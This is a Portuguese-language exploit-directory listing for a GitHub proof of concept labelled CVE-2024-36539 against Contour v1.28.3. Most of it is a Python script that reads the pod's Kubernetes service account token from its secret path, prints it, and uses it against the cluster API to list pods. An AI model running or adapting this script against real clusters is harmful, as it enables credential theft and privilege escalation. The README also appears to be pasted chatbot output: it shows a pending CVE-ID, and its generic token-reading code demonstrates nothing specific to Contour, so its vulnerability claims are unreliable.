Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36539 — Exploit PoC para permissões inseguras no Contour v1.28.3 que recupera um token de conta de serviço Kubernetes e acessa a API do cluster, demonstrando escalonamento de privilégios. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/cve-2024-36539
Escalada de PrivilégiosSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoSegurança na NuvemRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
abdurahmon3236/cve-2024-36539

CVE-2024-36539

Exploit PoC para permissões inseguras no Contour v1.28.3 que recupera um token de conta de serviço Kubernetes e acessa a API do cluster, demonstrando escalonamento de privilégios.

Ver Repositório
11há 2 anosAinda não revisado

Aqui está um README.md para uma Prova de Conceito (PoC) demonstrando a vulnerabilidade de permissões inseguras no Contour v1.28.3:


Prova de Conceito (PoC) para Vulnerabilidade de Permissões Inseguras no Contour v1.28.3

Este repositório contém um script de Prova de Conceito (PoC) demonstrando uma vulnerabilidade de permissões inseguras no Contour v1.28.3. Esta vulnerabilidade permite que atacantes acessem dados sensíveis e escalem privilégios ao obter o token da conta de serviço.

Descrição da Vulnerabilidade

CVE-ID: (Pendente)

Visão Geral: O Contour v1.28.3 contém permissões inseguras que permitem que atacantes acessem o token da conta de serviço. Ao explorar esta vulnerabilidade, um atacante pode obter o token da conta de serviço, que pode ser usado para acessar dados sensíveis e potencialmente escalar privilégios dentro do cluster Kubernetes.

Versões Afetadas:

  • Contour v1.28.3

Mitigações:

  • Revise e ajuste as permissões das contas de serviço usadas pelo Contour.
  • Garanta que as contas de serviço tenham as permissões mínimas necessárias.
  • Audite e rotacione regularmente os tokens das contas de serviço.

Detalhes da PoC

Este script de PoC demonstra como acessar o token da conta de serviço no Contour v1.28.3. Certifique-se de ter permissão explícita para realizar este teste.

Script da PoC

import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

Explicação

  1. Configuração: O script configura a URL da API do Kubernetes e os caminhos para os arquivos de token da conta de serviço e namespace.
  2. Obter Token da Conta de Serviço: Lê o token da conta de serviço do sistema de arquivos.
  3. Obter Namespace: Lê o namespace do sistema de arquivos.
  4. Acessar API do Kubernetes: Usa o token para fazer uma requisição à API do Kubernetes para listar os pods no namespace.

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar esta vulnerabilidade no sistema alvo. Testes não autorizados são ilegais e antiéticos.
  • Ambiente de Teste: Realize testes em um ambiente controlado para evitar impactos em sistemas de produção.
  • Uso Ético: Use esta PoC de forma responsável e apenas em contextos autorizados.

Mitigação

Para lidar com esta vulnerabilidade:

  1. Revise as Permissões da Conta de Serviço: Garanta que as contas de serviço tenham as permissões mínimas necessárias.
  2. Audite e Rotacione Tokens: Audite regularmente as contas de serviço e rotacione os tokens para minimizar o risco de comprometimento de token.
  3. Atualize o Contour: Mantenha o Contour e outros componentes do Kubernetes atualizados com as últimas correções de segurança.

Para mais informações sobre como proteger sua implantação do Contour, consulte a documentação oficial do Contour.


Este README.md fornece uma visão geral da vulnerabilidade, um script de PoC para demonstrar o problema e instruções sobre como mitigar o risco. Certifique-se de lidar com esta PoC de forma responsável e apenas em sistemas onde você tenha autorização explícita.

Baixar ferramenta